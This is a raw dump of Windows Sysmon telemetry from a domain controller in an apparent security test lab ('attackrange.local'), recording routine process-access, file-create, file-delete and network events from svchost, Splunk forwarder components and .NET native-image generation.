21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.664{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.668{4DB9351A-A147-60D3-D002-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.508{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB2A433C4C86824C18ABE3A92273461B,SHA256=A019EC64B9A8ED1D6F9E3BA57256156103FCAF2DB94891C32D945DF000F2ADD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:59.289{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14F77F4CC462BEEACF1752CD19BF64CE,SHA256=6743C940056E34B46018B61BEFC8A9B86D2E3B44DA0D67492A17D2B0D0AFBA53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:00.680{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DEAFF50E77C549DDE8560A676982DB7,SHA256=FE74D0E66993713C5B29E2B5F3FF4232F58E399A082CBBEF7E01703282EFD2EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:00.524{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33DCDF2A01FE80C53F0A17454334C18,SHA256=BE6D2133873B8D79474FEEAD2F56FFC87E52A01E7F2E2CCB7256E06D6FC98F7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:01.570{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3705B70C0014C6364C351FB8426A7DE0,SHA256=C9757CBAAFC84BB71257CA941433298098BB605D0F7F90B08565CB2F2E496BC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:01.320{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.914{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.899{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.899{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.742{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.742{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14A-60D3-D102-00000000CF01}6660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.602{4DB9351A-A146-60D3-CF02-00000000CF01}5568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O5H6Z3HL3W\System.Workflow.ComponentModel.ni.dll.auxMD5=688C6CF4A929D6B6A46AA0D20C3C088B,SHA256=C8A8A336DD46A2D97A19F13FB8CA434335BA188F4D2C46B5D615EDDBCD7F2CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.602{4DB9351A-A146-60D3-CF02-00000000CF01}5568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\O5H6Z3HL3W\System.Workflow.ComponentModel.ni.dllMD5=BAA214A5082FC7FF1F1FBA3E4E5D2F12,SHA256=AAAAC19024AF7FBAEDBF65C8E6AAE15887E3389A6D384B35EDB6DF720FBC0B22,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.586{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54C7FD5AA6A7BBE9A7842A7AFB7F5364,SHA256=B97DEEE0DE5139A0BEC58B09A7F0B2F9DE062EDE1FD9F817927D91C70AC5583B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:02.508{4DB9351A-A146-60D3-CF02-00000000CF01}5568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15c0-0\System.Workflow.ComponentModel.dll2021-06-23 21:02:02.508 23542300x800000000000000019397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.789{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=571167D11A5615B40ABF69C3E85EE5AB,SHA256=DDF690E6B0B9E38D17F9FDAC22EB41872C59A190B8C0620C87219860FD6D69B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.601{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC8102D6110206DB48825279D1074605,SHA256=E59BE2FFC44FED8160B639F1B69FD881D4818AB74D429540FCF847411CE0331D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:03.226{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.851{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.820{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.820{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14C-60D3-D302-00000000CF01}3928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.711{4DB9351A-A14A-60D3-D202-00000000CF01}5716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GBDB416032\System.Workflow.Runtime.ni.dll.auxMD5=264F462FE9E154280590A6AAE0CD3184,SHA256=FF58B834528695687225ECE95CB46797CBA517AFA0A5745E201F7A297EB8BD84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.711{4DB9351A-A14A-60D3-D202-00000000CF01}5716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GBDB416032\System.Workflow.Runtime.ni.dllMD5=B503C4624CD0019CF1E3AFA4566F6138,SHA256=2884AB09763C6899CF56E5F43611BB7D9B34361BFACA0766073C2C38AC6E71F7,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:04.648{4DB9351A-A14A-60D3-D202-00000000CF01}5716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1654-0\System.Workflow.Runtime.dll2021-06-23 21:02:04.648 23542300x800000000000000019399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:04.601{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908F335556DFAEA3F493A313C34B43A3,SHA256=C2A6AD94211327586EE1E45BFDDDACD5E71E16E05D8315D59144BEFE95FB9F0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:02.189{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61379-false10.0.1.12-8000- 23542300x800000000000000019410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.836{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F41147A83F94E3D94F9930A9BB01F8D1,SHA256=5786443E1616C2B9BE48AE5F9BF0AF91347F6414B74C3729151AC2B67994754C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.617{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A87BC2B0784A144043F210C982E80118,SHA256=A7BE68D03774D272FD23A3813373898963CB8796FCA4985C0D88DF135A3B58B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:05.086{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14D-60D3-D402-00000000CF01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 